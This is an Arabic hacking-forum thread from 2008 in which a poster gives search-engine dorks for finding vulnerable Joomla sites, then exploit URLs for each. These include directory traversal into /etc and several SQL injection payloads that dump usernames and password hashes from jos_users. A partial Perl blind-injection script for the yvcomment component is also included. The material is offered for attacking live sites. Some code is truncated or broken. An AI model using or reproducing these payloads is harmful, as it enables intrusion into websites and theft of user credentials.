الرئيسية . شركة استضافة . مركز تحميل . الإسلام . مكتبة الفيديو . المجموعة البريدية . خدمات للمواقع  . اتصل بنا
http://www.alkrsan.net/bnr/group.gif
يتم ارسال 30 رسالة كحد اقصى شهرياً ضع بريدك في المستطيل و اضغط اشتراك ستصلك رسالة قم بالضغط على الرابط الاول لتفعيل الاشتراك

 اجمع المال عبر الانترنت - تحميل من اليوتيب - تفسير الاحلام

حياك الله اخي الزائر هذة الرسالة تظهر للغير مسجيلن يشرفنا تسجيلك في منتديات القرصان للتسجيل اضغط هنا

 


العودة   منتديات القرصان > المواقع والسرفرات > قرصنة المواقع و السيرفرات

قرصنة المواقع و السيرفرات شرح الاختراق و اخر الثغرات

Tags H1 to H6

منتديات القرصان

أحدرت لكم أكتر من 10 ثغرات و كيفيت الاستغلال

أحدرت لكم أكتر من 10 ثغرات و كيفيت الاستغلال

موضوع مغلق
آلقائمة الرئيسية
التسجيل
البحث
مشاركات اليوم
التقويم
التعليمات
المتواجدون حالياً
مشاهدة ملفي الشخصي

الآعلانات

اقوى استضافة عربية


مواقع صديقة

روابط مفيدة
طلب كلمة المرور
كود التفعيل
تفعيل العضوية
مراسلة الإدارة

 
 
LinkBack أدوات الموضوع انواع عرض الموضوع
  #1  
قديم 11-28-2008, 12:50 PM

قرصان جديد

 
تاريخ التسجيل: Nov 2008
المشاركات: 2
sese-boy will become famous soon enough
Talking أحدرت لكم أكتر من 10 ثغرات و كيفيت الاستغلال

هلو هكريه اليوم جبت لكم هذا الموضوع
oomlaXplorer


ندخل الى محركات البحت



Sign In

و نبحت عن



كود PHP:
inurl:index.php?option=com_joomlaxplorer

او


كود PHP:
powered by joomlaXplorer



الاستغلال



كود PHP:
site.com/joomla/index.php?option=com_joomlaxplorer&action=show_err or&dir=..%2F..%2F..%2F%2F..%2F..%2Fetc
site.com/joomla/index.php?option=com_joomlaxplorer&action=show_err or&dir=..%2F..%2F..%2F%2F..%2F..%2F%2Fvar%2Fnamed


--------------------------------------------------------------

powered by extplorer


نبحت عن

كود PHP:
powered by extplorer
او

كود PHP:
inurl:index.php?option=com_extplorer




الاستغلال



كود PHP:
site.com/joomla/index.php?option=com_extplorer&action=show_error&d ir=..%2F..%2F..%2F%2F..%2F..%2Fetc
site.com/joomla/index.php?option=com_extplorer&action=show_error&d ir=..%2F..%2F..%2F%2F..%2F..%2F%2Fvar%2Fnamed

----------------------------------------------------------
Joomla Component FlippingBook 1.0.4



نبحت عن


كود PHP:
inurl:com_flippingbook



الاستغلال



كود PHP:
http://www.site.com/patch/_id=null/*...**/jos_users/*
--------------------------------------------------------------------------
Joomla Component Filiale




نبحت عن



كود PHP:
inurl:com_filiale


الاستغلال



كود PHP:
/index.php?option=com_filiale&idFiliale=-5+union+select+1,password,3,4,username,6,7,8,9,10, 11+from+jos_users
-------------------------------------------------------------------------

Joomla Component Profiler



نبحت عن


كود PHP:
allinurl:com_comprofiler

الاستغلال


كود PHP:
/index.php?option=com_comprofiler&task=userProfile& user=1/**/and/**/mid((select/**/password/**/from/**/jos_users/**/limit/**/0,1),1,1)/**/</**/Char(97)/*

-----------------------------------------------------------------------
Joomla Component JPad


نبحت عن

كود PHP:
allinurl:com_jpad


الاستغلال



كود PHP:
index.php?option=com_jpad&task=edit&Itemid=39&cid=-1 UNION ALL SELECT 1,2,3,concat_ws(0x3a,username,password),5,6,7,8 from jos_users--

-----------------------------------------------------------------------
Joomla Component yvcomment



نبحت عن



كود PHP:
inurl:yvcomment

الاستغلال


كود PHP:
exit;
}

my $host = $ARGV[0];
my $path = $ARGV[1];
my $userid = 1;
my $aid = $ARGV[2];

my %options = ();
GetOptions(%options, "u=i", "p=s", "a=i");

print "[~] Exploiting...\n";

if($options{"u"})
{
$userid = $options{"u"};
}

if($options{"a"})
{
$aid = $options{"a"};
}

syswrite(STDOUT, "[~] MD5-Hash: ", 14);

for(my $i = 1; $i <= 32; $i++)
{
my $f = 0;
my $h = 48;
while(!$f && $h <= 57)
{
if(istrue2($host, $path, $userid, $aid, $i, $h))
{
$f = 1;
syswrite(STDOUT, chr($h), 1);
}
$h++;
}
if(!$f)
{
$h = 97;
while(!$f && $h <= 122)
{
if(istrue2($host, $path, $userid, $aid, $i, $h))
{
$f = 1;
syswrite(STDOUT, chr($h), 1);
}
$h++;
}
}
}

print "\n[~] Exploiting done\n";

sub istrue2
{
my $host = shift;
my $path = shift;
my $uid = shift;
my $aid = shift;
my $i = shift;
my $h = shift;

my $ua = LWP::UserAgent->new;
my $query = "http://".$host.$path."index.php?option=com_yvcomment& view =comment&ArticleID=".$aid." and ascii(SUBSTRING((SELECT password FROM jos_users LIMIT 0,1 ),".$i.",1))=".$h."";

if($options{"p"})
{
$ua->proxy('http', "http://".$options{"p"});
}

my $resp = $ua->get($query);
my $******* = $resp->*******;
my $regexp = "DateAndAuthor";

if($******* =~ /$regexp/)
{
return 1;
}
else
{
return 0;
}

}
--------------------------------------------------------------------------

Joomla Component jabode


نبحت عن

كود PHP:
inurl:com_jabode


الاستغلال



كود PHP:
http://localhost/[Joomla_Path]/index.php?option=com_jabode&task=sign&sign=taurus& id=-2 UNION SELECT user(),user(),user(),user(),concat(username,0x3a,p assword) FROM jos_users

بالنهاية اتمنى يكون الموضوع مفيد للجميع و عدم استخدامه الا في طاعة اللًه و رسولة ..

اللهم بلغت اللهم فاشه


أخوكم : ThE-WolF


Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!

حمل اي مقطع فيديوا من 
اليوتيب بدون برامج

اقوى استضافة عربية

  #2  
قديم 11-29-2008, 10:45 PM

قرصان فعال

 
تاريخ التسجيل: Nov 2008
المشاركات: 40
hassan665 will become famous soon enough
افتراضي

ممكن شرح طريقة الاستغلال
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
  #3  
قديم 12-01-2008, 08:44 PM

قرصان خبير

 
تاريخ التسجيل: Nov 2008
الدولة: في أردن النشامى
المشاركات: 296
hisham_master will become famous soon enough
افتراضي

Thanks thanks
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
موضوع مغلق



يتصفح الموضوع حالياً : 1 (0 عضو و 1 ضيف)
 
أدوات الموضوع
انواع عرض الموضوع

ضوابط المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا يمكنك اضافة مرفقات
لا يمكنك تعديل مشاركاتك

BB code متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are معطلة
Pingbacks are معطلة
Refbacks are معطلة



جميع الأوقات بتوقيت GMT. الساعة الآن 09:48 PM.


Powered by vBulletin® Version 3.8.3
Copyright ©2000 - 2010, Jelsoft Enterprises Ltd.
Content Relevant URLs by vBSEO 3.3.2

تعريب » القرصان - خدمات الويب

:: الحماية برعاية (القرصان - خدمات الويب ) ::


Secruity By Krsan.com
جميع الحقوق محفوظة القرصان 2006-2010